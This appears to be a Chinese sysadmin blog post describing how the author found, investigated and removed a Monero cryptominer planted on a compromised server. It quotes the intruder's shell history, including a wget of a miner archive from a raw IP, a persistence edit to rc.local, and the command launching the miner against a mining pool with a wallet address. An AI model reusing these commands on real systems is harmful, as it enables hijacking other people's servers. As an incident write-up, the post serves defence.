早上到公司发现zabbix有一个报警:一台服务器的CPU使用率达到100%!
1.立即登录该服务器查看CPU top10

ps aux | head -1; | ps aux | grep -v PID | sort -rn -k 4 |head

发现 有一个yam开头的进程CPU已经占用120%,(此处无截图)
经确认,并非业务上的应用,凭经验分析,可以断定是被入侵了。

2.find找一下本地有没有yam相关的目录

find / -name yam

已经查到了(下图),就在root家目录下,有压缩包,还有解压的目录,痕迹也太明显了吧! 打开看一下里面的内容发现是一个挖矿机。

3.查看下登录日志

last

这三个IP是美国的,不知道是不是代理,然后看一下登录进来都做什么操作了:

history

贴出关键部分

884  wget http://210.245.92.160:9090/miner.tgz885  vi /etc/rc.d/rc.local886  tar zxvf miner.tgz887  cd yam-yvg1900-M7v-linux64-generic888  cd linux64-generic889  nohup ./yam -c 1 -M stratum+tcp://48zmbpHJyke7y9uewNAS7miDMqQcz8RH7BTqKaYFtVWx2UJ7mzLqVd8KWjeW1Bu5jr2zcUZqTHzYofn3kT76PsndSb5h3M3:x@erebor.dwarfpool.com:8005:8050:8080:8100/xmr

很明显,下载了这个包,解压运行了,还加了开机启动,不过竟然没有清除痕迹就走了。

4.看一下他get的这个网站

好吧,自己做的一个页面方便别人下载矿机用的。
在里面的文件发现软件的作者

5.清理工作
kill 掉进程
删除root家目录的包
删除/etc/rc.d/rc.local中的开机启动项
更改root密码

先做这么多,大家还有什么好的建议请多指教。

服务器被入侵当做挖矿肉鸡相关推荐

  1. 服务器遭到入侵被抓肉鸡应该怎么办---宇众网络

    一.立即更改服务器信息和相关权限 1.更改系统管理员账户的密码,密码长度不小于8位并且使用大写字母/小写字母/数字/特殊字符组合: 2.更改远程登录端口并开启防火墙限制允许登录的IP,防火墙配置只开放 ...

  2. 记录一次服务器被入侵(恶意挖矿)的问题

    一.问题描述 阿里云服务器这段时间一直给我发送报警信息,如下图所示: 二.问题的解决过程 我对这些报警都没太在意,直到有天我登录宝塔界面,发现登录的过程非常的卡顿,用xshell连接服务器(包括敲命令 ...

  3. 记一次服务器被入侵,没想到我轻松搞定了它~

    作者:tlanyan 链接:https://itlanyan.com/server-being-hacked-log/ 常在河边走,哪能不湿鞋.自认为安全防范意识不错,没想到服务器被入侵挖矿的事情也能 ...

  4. 记一次云服务器被入侵

    这次入侵发生在半年前,那时候还没建立CSDN,今天记录一下. 服务器:腾讯云学生机 Centos6.x 1核 1GB 1Mbps Wordpress最近爆出漏洞,不少用户遭到攻击. 这是发生在我主机上 ...

  5. 针对phpStudy网站服务器的入侵

    今天客户服务器上出现报警,查找了下原因,发现根目录下有wk.php E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community ...

  6. 看服务器被入侵如何排查?如何防止服务器被入侵?

    遇到很多次客户服务器被入侵的情况,有些服务器被植入木马后门.有些被检查出有挖矿程序.有些发现登录密码不对,被恶意登录修改了密码,遇到了服务器被入侵的情况应第一时间联系服务商售后处理将损失降低到最低程度 ...

  7. 服务器被入侵如何排查

    如何判断服务器是否被入侵? 1.当服务器刚启动一会时,系统cpu占用就达到一百,这时很有可能当前服务器就被ddos或者被入侵后cpu被用于挖矿. 2.服务器正在运行,首先先要考虑本机部署的应用服务是否 ...

  8. 关于服务器被入侵+植入病毒木马

    近期项目中遇到了几个棘手的问题,海外服务器被植入木马病毒程序.之前一直听说xxx的服务器被入侵,这次实打实遇到,还是没有做好安全防护策略 目录 1.木马病毒侵入系统 2.发现入侵病毒+木马 3.定位木 ...

  9. 服务器被入侵如何排查?如何防止服务器被入侵?

    服务器被入侵如何排查?如何防止服务器被入侵? 如何排查服务器被攻击? 排查 1.日志 2.系统分析 3.进程分析 4.文件系统 5.后门排查 加固建议 假如有一天真的遇到攻击了,怎么办呢? 事前检查和 ...

最新文章

  1. 可持久化Trie +枚举 ---- P5795 [THUSC2015]异或运算
  2. 如何形成统一设计风格-实践篇
  3. 优客365导航系统美化UI版源码-带交易功能
  4. day4-mysql数据关系
  5. 利用BioPerl将DNA序列翻译成蛋白序列
  6. virtuaBox 连接不上解决办法
  7. 百度统计挂了,分布式数据库异常引起,数据显示为空!
  8. poj_3468 伸展树
  9. 自媒体免费素材,国旗高清无水印素材,PNG格式,直接引用即可
  10. c语言 解析通信报文,基于DL/T645—2007通信规约报文的分析
  11. Windows10桌面美化
  12. 【Android驱动】module_init 和 module_exit
  13. 12306 流程解析
  14. MMDet——基于Chamfer Distance评估点集
  15. 2023在家赚钱怎么做,有什么适合在家做的副业项目
  16. python 传奇辅助_制作游戏辅助:使用函数窗口处理验证码
  17. 测试功能点----方法
  18. 大数据——Java中异常的捕获和处理
  19. Process terminated以及出现Dependency not found的情况
  20. 基于MATLAB实现进制数转换

热门文章

  1. Low-light images enhancement系列:EnlightenGAN:Deep Light Enhancement without Paired Supervision
  2. 华为系大数据专家傅一航老师--沪师经纪刘建
  3. c语言long型数据转换,详解C语言的类型转换
  4. 微信小程序--字体水平垂直居中
  5. 内卷?谈谈AI算法人才职业发展
  6. 玩游戏键盘一按就打开计算机,win10电脑玩游戏时按键盘会自动弹字
  7. centOs7开启防火墙
  8. 傻-amp;gt;天使
  9. 【HTML】HTML首页---拼多多首页界面-网易首页界面
  10. 汇编实现两位数(包括负数)以内的输入,排序和输出